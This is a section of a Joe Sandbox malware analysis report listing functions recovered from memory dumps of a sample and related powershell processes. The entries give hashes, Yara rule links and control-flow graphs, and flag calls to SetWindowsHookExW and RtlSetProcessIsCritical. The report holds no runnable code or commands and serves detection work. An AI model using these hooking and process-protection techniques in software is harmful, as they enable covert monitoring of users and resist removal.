                                                                  Function 00007FFD9B896662 Relevance: .5, Instructions: 452COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a394030e576c89a08693277df8052784318f1d59a5bef476c0ff8400ad80172
                                                                  • Instruction ID: 2e9baf30a913b14c21c51fc631232043a719ca2cecdabebd2a8abf304cdb77fd
                                                                  • Opcode Fuzzy Hash: 0a394030e576c89a08693277df8052784318f1d59a5bef476c0ff8400ad80172
                                                                  • Instruction Fuzzy Hash: A7E1B470A09A4E8FEFA8DF28C8657E97BD1FF58350F04426AD84DC7295CF7499418B81
                                                                  Function 00007FFD9B891771 Relevance: .4, Instructions: 396COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78da56b4ea0ea925ccfca5ee7c442a4212c3a06010806f896b8afb37bdf51cc7
                                                                  • Instruction ID: 59083c72b5b1a8d9b119e76321027719377589e2ef9b34382ce415650fda3f3b
                                                                  • Opcode Fuzzy Hash: 78da56b4ea0ea925ccfca5ee7c442a4212c3a06010806f896b8afb37bdf51cc7
                                                                  • Instruction Fuzzy Hash: 5FC1C461B1D90E5FEF98F76C84756B97AD2EF9C301F05017AE05EC32E6DE28A9024341
                                                                  Function 00007FFD9B898E61 Relevance: 1.8, APIs: 1, Instructions: 262COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 483 7ffd9b898e61-7ffd9b898e65 484 7ffd9b898e67-7ffd9b898e68 483->484 485 7ffd9b898e6a-7ffd9b898e79 483->485 484->485 486 7ffd9b898e7c-7ffd9b898ee8 485->486 487 7ffd9b898e7b 485->487 491 7ffd9b898eea-7ffd9b898eef 486->491 492 7ffd9b898ef2-7ffd9b898f24 486->492 487->486 491->492 494 7ffd9b898f26 492->494 495 7ffd9b898f2c-7ffd9b898f5f 492->495 494->495 497 7ffd9b898f6a-7ffd9b898fdd 495->497 498 7ffd9b898f61-7ffd9b898f69 495->498 502 7ffd9b899069-7ffd9b89906d 497->502 503 7ffd9b898fe3-7ffd9b898fe8 497->503 498->497 504 7ffd9b898ff2-7ffd9b89902f SetWindowsHookExW 502->504 505 7ffd9b898fef-7ffd9b898ff0 503->505 506 7ffd9b899037-7ffd9b899068 504->506 507 7ffd9b899031 504->507 505->504 507->506
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 8e149019017579ef8b328fb8a68d0d45bd2e1b70cf93c5d24c37b8743d07117f
                                                                  • Instruction ID: f5625dcebce2da45dff5711a8e1b113ebf06d36223d4996679e842744f9de880
                                                                  • Opcode Fuzzy Hash: 8e149019017579ef8b328fb8a68d0d45bd2e1b70cf93c5d24c37b8743d07117f
                                                                  • Instruction Fuzzy Hash: 48712631A0CA5D8FDB19DB68D85AAF97BE1EF59321F00427FD019C3292CB64A842C781
                                                                  Function 00007FFD9B89892D Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 510 7ffd9b89892d-7ffd9b898af0 call 7ffd9b898330 RtlSetProcessIsCritical 525 7ffd9b898af8-7ffd9b898b2d 510->525 526 7ffd9b898af2 510->526 526->525
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalProcess
                                                                  • String ID:
                                                                  • API String ID: 2695349919-0
                                                                  • Opcode ID: 334357b9974f026af622feab56e3bfa04b8a010f011e77f9c3c40496bb77489a
                                                                  • Instruction ID: 6506d0ea4c3e9f4527f4b13df4b54a174a718dddd13279f0f452d9e533e4fc59
                                                                  • Opcode Fuzzy Hash: 334357b9974f026af622feab56e3bfa04b8a010f011e77f9c3c40496bb77489a
                                                                  • Instruction Fuzzy Hash: 8D614931908A4D8FCB18DF68C859AE97BF0FF59310F04426FD08AC7192DB35A846CB81
                                                                  Function 00007FFD9B8983B5 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 8a56bead0db863ba1fa4641017e3275fe0dd597596d064604067da70560b1e31
                                                                  • Instruction ID: f54def3aea782a6cf0897c83efccb7a6c4204bdb0dbc78b956c8af3f6f554822
                                                                  • Opcode Fuzzy Hash: 8a56bead0db863ba1fa4641017e3275fe0dd597596d064604067da70560b1e31
                                                                  • Instruction Fuzzy Hash: 2A512A72B0DA4D4FEB28DBAC9C256B97BE1EF59321F14017FD05DC31A3CA2569428781
                                                                  Function 00007FFD9B8983C0 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 648 7ffd9b8983c0-7ffd9b898fdd 653 7ffd9b899069-7ffd9b89906d 648->653 654 7ffd9b898fe3-7ffd9b898fe8 648->654 655 7ffd9b898ff2-7ffd9b89902f SetWindowsHookExW 653->655 656 7ffd9b898fef-7ffd9b898ff0 654->656 657 7ffd9b899037-7ffd9b899068 655->657 658 7ffd9b899031 655->658 656->655 658->657
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 9ea8606cde09fa009372cace13ab6cd1b10083c6a9b49bd931a5b9020736bb19
                                                                  • Instruction ID: 77a94391ecfcb211e0bae0d8798c686d1b9becd63c39d25dcb8548d5d90eef04
                                                                  • Opcode Fuzzy Hash: 9ea8606cde09fa009372cace13ab6cd1b10083c6a9b49bd931a5b9020736bb19
                                                                  • Instruction Fuzzy Hash: 7B310931A0CA4C4FEB1CEF5CD8156B97BE1EB59311F00427ED059D3292DA70A8428781

                                                                  Executed Functions

                                                                  Function 00007FFD9B95662A Relevance: .4, Instructions: 420COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cb2a0838ef0de51526c4ebf63319d6c3da66bae3dc608907d9a9341cb184171
                                                                  • Instruction ID: d894dec34bfb2e7c588e6bfa3e6e01963948e9601467d0c53df7640ffb1a5dc0
                                                                  • Opcode Fuzzy Hash: 0cb2a0838ef0de51526c4ebf63319d6c3da66bae3dc608907d9a9341cb184171
                                                                  • Instruction Fuzzy Hash: B2C14532B1FA8E1FEBA5ABA848755B57BE0EF51310B0901BED85DC70E7DA18AD05C341
                                                                  Function 00007FFD9B889758 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d21052d2e694d5660b0f067e9e09559247a38acda7aa60e08483fd05801f8716
                                                                  • Instruction ID: 561fbc565cdb66ae7f6f30d841619bcbcfde0667e0a6d25cec1e62d65e18457b
                                                                  • Opcode Fuzzy Hash: d21052d2e694d5660b0f067e9e09559247a38acda7aa60e08483fd05801f8716
                                                                  • Instruction Fuzzy Hash: DF310C71A1DF4C8FDB189F5C984A6E97BE1FB99310F00412FE45993252DA70A855CBC2
                                                                  Function 00007FFD9B88A62C Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f1bf3cd04ffa75b246d5dcae7e68ae381669807eee429ae0572c4c058c15fb0
                                                                  • Instruction ID: 553f8c84b92d8e408595d9be59871f4b026985d6fae4af7c8f69a0efdde1fa1b
                                                                  • Opcode Fuzzy Hash: 5f1bf3cd04ffa75b246d5dcae7e68ae381669807eee429ae0572c4c058c15fb0
                                                                  • Instruction Fuzzy Hash: A421263090CB4C4FDB59DFAC984A7E97BF0EBA6321F04416BD448C3196DA74941ACB92
                                                                  Function 00007FFD9B76E41F Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800216154.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b76d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                  • Instruction ID: 522c281367f8cd39f184f62ec27b82c0832a8d6d14c9dbd060c0e6522b8ac430
                                                                  • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                  • Instruction Fuzzy Hash: E8014F3160CE088F9AA4EF2EE48595237E0FB98320710065AE41DC756AD731F891CBC1
                                                                  Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8619d5d3d75962e74ff1ffb8351a320bac4c28d42fb0be8bb6902258ee90ee6c
                                                                  • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                  • Opcode Fuzzy Hash: 8619d5d3d75962e74ff1ffb8351a320bac4c28d42fb0be8bb6902258ee90ee6c
                                                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                  Function 00007FFD9B95414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34c4fb9d294938c82691e40d6b384e2be4deacc55872c278f004643f5f74a914
                                                                  • Instruction ID: a8a743c99361bab1c05fce395610e3906bdc469338ea1036e2773aa2cafd4e81
                                                                  • Opcode Fuzzy Hash: 34c4fb9d294938c82691e40d6b384e2be4deacc55872c278f004643f5f74a914
                                                                  • Instruction Fuzzy Hash: 96F0BE32B4E5098FD7A9EA9CE4519E873E0EF65320B1600BAE06DC72B7CA25EC40C741
                                                                  Function 00007FFD9B954400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01b154888f1f3c206bef50cf5dbecda22f418d2fdf3839bb6fa6f4990536d6b1
                                                                  • Instruction ID: dd1e6a92ac3ed16bb6159075bfe773dbda650f7da38fe6f2b115ca486aec9751
                                                                  • Opcode Fuzzy Hash: 01b154888f1f3c206bef50cf5dbecda22f418d2fdf3839bb6fa6f4990536d6b1
                                                                  • Instruction Fuzzy Hash: 05F0BE32A8E5498FD7A8EA9CE0609A873E0FF0532071600BAE05DCB1A7CA25BC40C740
                                                                  Function 00007FFD9B9541D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80
                                                                  Function 00007FFD9B88A2AA Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                                  • Instruction ID: 3802ec5be2d9221bbc0c928bb53893fd5c381f0b2bc07e657ec37962820c2307
                                                                  • Opcode Fuzzy Hash: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                                  • Instruction Fuzzy Hash: 62E01235505A4D8FDB55DF18C8554E97BA0FF68201B01425BE41DC7161DB719554CBC2

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B888BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^4$N_^7$N_^F$N_^J
                                                                  • API String ID: 0-3508309026
                                                                  • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                  • Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
                                                                  • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                  • Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1

                                                                  Executed Functions

                                                                  Function 00007FFD9B89644D Relevance: .7, Instructions: 711COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df4287ea0a60840170c40f21cce917b4f15806919479ab280dabe8cda0ecacbe
                                                                  • Instruction ID: 81b71b770f79cfa880cf874363d84b16367049834170ccbdbc2a3101db4b4539
                                                                  • Opcode Fuzzy Hash: df4287ea0a60840170c40f21cce917b4f15806919479ab280dabe8cda0ecacbe
                                                                  • Instruction Fuzzy Hash: 7AD19070A18A4D8FDF98DF58C465AE97BE1FF68340F1541AAD40DD72A6CB34E881CB81
                                                                  Function 00007FFD9B966605 Relevance: .4, Instructions: 441COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da185dd60ff26320368d5b7d9f58b2eaf931f4bca34c99ee7442e12f66ad2482
                                                                  • Instruction ID: 3550636a8c333136716f678c4dabf38f997d7921475fe11bce6035687f06f318
                                                                  • Opcode Fuzzy Hash: da185dd60ff26320368d5b7d9f58b2eaf931f4bca34c99ee7442e12f66ad2482
                                                                  • Instruction Fuzzy Hash: DED14732A1FB8E9FEBA59BA858655B57BE0EF52310B0901FFD45CC70E3DA18A905C341
                                                                  Function 00007FFD9B89B258 Relevance: .4, Instructions: 362COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a197f4d91579542f19a13a199b63c2f54c590804a1e3027bf895c6e8b91a62f3
                                                                  • Instruction ID: 155d1fef54cff487082eecfc54779a98ddea77ffc6039a642fe76e3a5f244ef8
                                                                  • Opcode Fuzzy Hash: a197f4d91579542f19a13a199b63c2f54c590804a1e3027bf895c6e8b91a62f3
                                                                  • Instruction Fuzzy Hash: 3DB13870A1DB4D8FDB58EF68C895AB57BE1EF99310F10017ED08AC31A6DA25F846CB41
                                                                  Function 00007FFD9B899750 Relevance: .1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                  • Instruction ID: 96c0ac9101b0ca48e6db44437c2ff1c87884f1fd2b7ab5e85d54977e619b0df1
                                                                  • Opcode Fuzzy Hash: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                  • Instruction Fuzzy Hash: E041387190DB884FDB18DF5C9C0A6A87FE1FB99310F04416FE499C3292DA70A905CBC2
                                                                  Function 00007FFD9B77ED40 Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898116912.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b77d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb456c58ceffb4b36f2e025bc85931e215ec18726ec6bba4cc5e04eaa96e2e76
                                                                  • Instruction ID: 968f3fb83a6ba1b9fd42c1a4c0579ff0800aa416216f591a456f0687ebff2bcc
                                                                  • Opcode Fuzzy Hash: eb456c58ceffb4b36f2e025bc85931e215ec18726ec6bba4cc5e04eaa96e2e76
                                                                  • Instruction Fuzzy Hash: 6A41247140EBC44FE7669B2898919523FF4EF57220B1A06DFD088CB1B3D629A846C792
                                                                  Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                  Function 00007FFD9B89A0FB Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b1bb4d2c1538da357dae119ccfa954c5db61d2dc78202ce7a6a31f608dd5b138
                                                                  • Instruction ID: 6e8ea1eac01fdcb23945219650ca695fbd61f89e3a1a3002510d65d8e3edcb02
                                                                  • Opcode Fuzzy Hash: b1bb4d2c1538da357dae119ccfa954c5db61d2dc78202ce7a6a31f608dd5b138
                                                                  • Instruction Fuzzy Hash: D9F0C83AA1AA8C5FEB91EF1898654E87FA0FF5A211B0502B7D449C7061DA2195488782
                                                                  Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                  • Instruction ID: 0037cf7cd0e8da730bb9c57dfdf167aedc042902d057b13c57502d39fd69f30a
                                                                  • Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                  • Instruction Fuzzy Hash: D0F0BE32B0E5098FD769EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC40C741
                                                                  Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                  • Instruction ID: 71936907c65e5d25e9726e2641dbf7dddf597606121a57d3b6974e27c6721ca6
                                                                  • Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                  • Instruction Fuzzy Hash: 0CF0BE32A0E5498FD769EB9CE0619A873E0FF0532071600BAE05DCB1A3CA26AC40C740
                                                                  Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B898BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                  • API String ID: 0-962139525
                                                                  • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                  • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                                                  • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                  • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81

                                                                  Executed Functions

                                                                  Function 00007FFD9B98660A Relevance: .4, Instructions: 440COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2040797010.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b980000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b7a0cd7baf5420a3ba8eea77e88cd5401fff920ff53ae565ab26893f270d6bf
                                                                  • Instruction ID: 2d2efc34c12dd9875a1ca289fdeca1524006620449fd10f8c8618bff1cb7a234
